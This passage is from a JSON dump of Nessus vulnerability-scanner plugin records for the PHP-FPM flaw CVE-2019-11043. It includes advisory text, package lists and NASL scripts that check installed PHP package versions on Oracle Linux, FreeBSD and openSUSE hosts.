reference:\"php-mbstring-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-mysqlnd-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-mysqlnd-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-odbc-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-odbc-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-opcache-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-opcache-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-pdo-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-pdo-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-pgsql-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-pgsql-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-process-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-process-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-recode-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-recode-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-snmp-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-snmp-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-soap-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-soap-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-xml-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-xml-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-xmlrpc-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-xmlrpc-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-dbg / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:31:55", "description": "From Red Hat Security Advisory 2019:3735 :\n\nAn update for the php:7.2 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nSecurity Fix(es) :\n\n* php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {}, "published": "2019-11-25T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : php:7.2 (ELSA-2019-3735)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:apcu-panel", "p-cpe:/a:oracle:linux:libzip", "p-cpe:/a:oracle:linux:libzip-devel", "p-cpe:/a:oracle:linux:libzip-tools", "p-cpe:/a:oracle:linux:php", "p-cpe:/a:oracle:linux:php-bcmath", "p-cpe:/a:oracle:linux:php-cli", "p-cpe:/a:oracle:linux:php-common", "p-cpe:/a:oracle:linux:php-dba", "p-cpe:/a:oracle:linux:php-dbg", "p-cpe:/a:oracle:linux:php-devel", "p-cpe:/a:oracle:linux:php-embedded", "p-cpe:/a:oracle:linux:php-enchant", "p-cpe:/a:oracle:linux:php-fpm", "p-cpe:/a:oracle:linux:php-gd", "p-cpe:/a:oracle:linux:php-gmp", "p-cpe:/a:oracle:linux:php-intl", "p-cpe:/a:oracle:linux:php-json", "p-cpe:/a:oracle:linux:php-ldap", "p-cpe:/a:oracle:linux:php-mbstring", "p-cpe:/a:oracle:linux:php-mysqlnd", "p-cpe:/a:oracle:linux:php-odbc", "p-cpe:/a:oracle:linux:php-opcache", "p-cpe:/a:oracle:linux:php-pdo", "p-cpe:/a:oracle:linux:php-pear", "p-cpe:/a:oracle:linux:php-pecl-apcu", "p-cpe:/a:oracle:linux:php-pecl-apcu-devel", "p-cpe:/a:oracle:linux:php-pecl-zip", "p-cpe:/a:oracle:linux:php-pgsql", "p-cpe:/a:oracle:linux:php-process", "p-cpe:/a:oracle:linux:php-recode", "p-cpe:/a:oracle:linux:php-snmp", "p-cpe:/a:oracle:linux:php-soap", "p-cpe:/a:oracle:linux:php-xml", "p-cpe:/a:oracle:linux:php-xmlrpc", "cpe:/o:oracle:linux:8"], "id": "ORACLELINUX_ELSA-2019-3735.NASL", "href": "https://www.tenable.com/plugins/nessus/131270", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:3735 and \n# Oracle Linux Security Advisory ELSA-2019-3735 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131270);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"RHSA\", value:\"2019:3735\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"Oracle Linux 8 : php:7.2 (ELSA-2019-3735)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2019:3735 :\n\nAn update for the php:7.2 module is now available for Red Hat\nEnterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nSecurity Fix(es) :\n\n* php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2019-November/009383.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php:7.2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apcu-panel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libzip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libzip-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libzip-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pecl-apcu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pecl-apcu-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pecl-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 8\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"apcu-panel-5.1.12-2.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"libzip-1.5.1-2.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"libzip-devel-1.5.1-2.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"libzip-tools-1.5.1-2.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-bcmath-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-cli-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-common-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-dba-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-dbg-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-devel-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-embedded-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-enchant-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-fpm-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-gd-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-gmp-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-intl-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-json-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-ldap-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-mbstring-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-mysqlnd-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-odbc-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-opcache-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-pdo-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-pear-1.10.5-9.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-pecl-apcu-5.1.12-2.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-pecl-apcu-devel-5.1.12-2.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-pecl-zip-1.15.3-1.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-pgsql-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-process-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-recode-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-snmp-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-soap-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-xml-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-xmlrpc-7.2.11-4.module+el8.1.0+5443+bc1aeb77\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apcu-panel / libzip / libzip-devel / libzip-tools / php / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:32:09", "description": "The PHP project reports :\n\nThe PHP development team announces the immediate availability of PHP 7.3.11. This is a security release which also contains several bug fixes.\n\nThe PHP development team announces the immediate availability of PHP 7.2.24. This is a security release which also contains several bug fixes.\n\nThe PHP development team announces the immediate availability of PHP 7.1.33. This is a security release which also contains several bug fixes.", "cvss3": {}, "published": "2019-11-07T00:00:00", "type": "nessus", "title": "FreeBSD : php -- env_path_info underflow in fpm_main.c can lead to RCE (6a7c2ab0-00dd-11ea-83ce-705a0f828759)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:php71", "p-cpe:/a:freebsd:freebsd:php72", "p-cpe:/a:freebsd:freebsd:php73", "p-cpe:/a:freebsd:freebsd:php74", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_6A7C2AB000DD11EA83CE705A0F828759.NASL", "href": "https://www.tenable.com/plugins/nessus/130617", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130617);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"FreeBSD : php -- env_path_info underflow in fpm_main.c can lead to RCE (6a7c2ab0-00dd-11ea-83ce-705a0f828759)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The PHP project reports :\n\nThe PHP development team announces the immediate availability of PHP\n7.3.11. This is a security release which also contains several bug\nfixes.\n\nThe PHP development team announces the immediate availability of PHP\n7.2.24. This is a security release which also contains several bug\nfixes.\n\nThe PHP development team announces the immediate availability of PHP\n7.1.33. This is a security release which also contains several bug\nfixes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.php.net/archive/2019.php#2019-10-24-1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.php.net/archive/2019.php#2019-10-24-2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.php.net/archive/2019.php#2019-10-24-3\"\n );\n # https://vuxml.freebsd.org/freebsd/6a7c2ab0-00dd-11ea-83ce-705a0f828759.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9836f8cc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php71\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php72\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php73\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php74\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php71<7.1.33\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php72<7.2.24\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php73<7.3.11\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php74<7.4.0.rc5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:31:42", "description": "This update for php7 fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2019-11043: Fixed possible remote code execution via env_path_info underflow in fpm_main.c (bsc#1154999).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2019-11-06T00:00:00", "type": "nessus", "title": "openSUSE Security Update : php7 (openSUSE-2019-2441)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_php7", "p-cpe:/a:novell:opensuse:apache2-mod_php7-debuginfo", "p-cpe:/a:novell:opensuse:php7", "p-cpe:/a:novell:opensuse:php7-bcmath", "p-cpe:/a:novell:opensuse:php7-bcmath-debuginfo", "p-cpe:/a:novell:opensuse:php7-bz2", "p-cpe:/a:novell:opensuse:php7-bz2-debuginfo", "p-cpe:/a:novell:opensuse:php7-calendar", "p-cpe:/a:novell:opensuse:php7-calendar-debuginfo", "p-cpe:/a:novell:opensuse:php7-ctype", "p-cpe:/a:novell:opensuse:php7-ctype-debuginfo", "p-cpe:/a:novell:opensuse:php7-curl", "p-cpe:/a:novell:opensuse:php7-curl-debuginfo", "p-cpe:/a:novell:opensuse:php7-dba", "p-cpe:/a:novell:opensuse:php7-dba-debuginfo", "p-cpe:/a:novell:opensuse:php7-debuginfo", "p-cpe:/a:novell:opensuse:php7-debugsource", "p-cpe:/a:novell:opensuse:php7-devel", "p-cpe:/a:novell:opensuse:php7-dom", "p-cpe:/a:novell:opensuse:php7-dom-debuginfo", "p-cpe:/a:novell:opensuse:php7-embed", "p-cpe:/a:novell:opensuse:php7-embed-debuginfo", "p-cpe:/a:novell:opensuse:php7-enchant", "p-cpe:/a:novell:opensuse:php7-enchant-debuginfo", "p-cpe:/a:novell:opensuse:php7-exif", "p-cpe:/a:novell:opensuse:php7-exif-debuginfo", "p-cpe:/a:novell:opensuse:php7-fastcgi", "p-cpe:/a:novell:opensuse:php7-fastcgi-debuginfo", "p-cpe:/a:novell:opensuse:php7-fileinfo", "p-cpe:/a:novell:opensuse:php7-fileinfo-debuginfo", "p-cpe:/a:novell:opensuse:php7-firebird", "p-cpe:/a:novell:opensuse:php7-firebird-debuginfo", "p-cpe:/a:novell:opensuse:php7-fpm", "p-cpe:/a:novell:opensuse:php7-fpm-debuginfo", "p-cpe:/a:novell:opensuse:php7-ftp", "p-cpe:/a:novell:opensuse:php7-ftp-debuginfo", "p-cpe:/a:novell:opensuse:php7-gd", "p-cpe:/a:novell:opensuse:php7-gd-debuginfo", 